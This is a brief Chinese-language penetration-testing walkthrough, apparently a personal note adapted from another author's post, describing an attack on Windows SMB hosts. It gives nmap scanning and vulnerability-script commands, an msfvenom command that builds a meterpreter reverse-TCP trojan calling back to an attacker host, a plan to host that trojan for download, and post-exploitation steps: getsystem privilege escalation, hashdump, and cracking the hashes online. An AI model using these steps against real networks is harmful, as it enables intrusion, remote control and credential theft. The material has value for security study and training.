整体思路转自:paper.tuisec.win/detail-119767e6b79612b.html
扫描C段或B段网段存活主机,www.jianshu.com/writer#/notebooks/11379001/notes/15623216
或利用nmap扫描存在smb服务的主机(这里主要测试存在smb漏洞的主机)
nmap -A -p 139,445 x.x.x.1-254 -oG smb_service.txt
其中,-A 代表扫描版本号和系统
-oG 输出到文件
cat smb_service.txt | grep 'windows' | cut -d " " -f2 > smb_service_host.txt
扫描存在smb漏洞的主机
find / -name smb*vuln*.nse 查找nse脚本文件
for vul in$(find / -name smb*vuln*.nse | cut -d"/"-f 6);do nmap -v -p 139,445 --script=$vul -iL smb_server_host.txt -oN smb_vulns_$vul.txt;done
nmap -iL 输入文件
-oN 输出文件
漏洞利用
若成功,则返回shell
但此shell不稳当,要想办法获得meterpreter,获得更强大的功能
后渗透
得到初步的shell后,检查目标系统的操作系统版本,以生成对应版本的木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f exe -a x64 --platform win -o mp_64.exe
上传meterpreter的木马到攻击机的/var/www/html下,方便下载
重新开启一个msfconsole并开启监听。
重要一步:利用不稳当的shell创建一个powershell用于下载我们的meterpreter木马
ps怎么写?(还未研究)
仿照原文作者大牛写的,
下载成功,运行木马文件l.exe,成功获得meterpreter
meterpreter后渗透,getuid,getsystem(提权)、shell获取shell,hashdump获取hash密码,并可通过http://www.objectif-securite.ch/en/ophcrack.php一个在线的LMHash破解网站